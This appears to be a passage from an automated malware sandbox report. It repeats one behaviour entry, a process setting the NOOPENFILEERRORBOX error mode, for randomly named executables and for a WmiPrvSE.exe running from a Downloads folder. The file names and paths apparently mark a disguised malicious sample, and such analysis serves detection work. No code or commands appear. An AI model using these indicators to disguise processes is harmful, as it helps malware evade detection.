            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
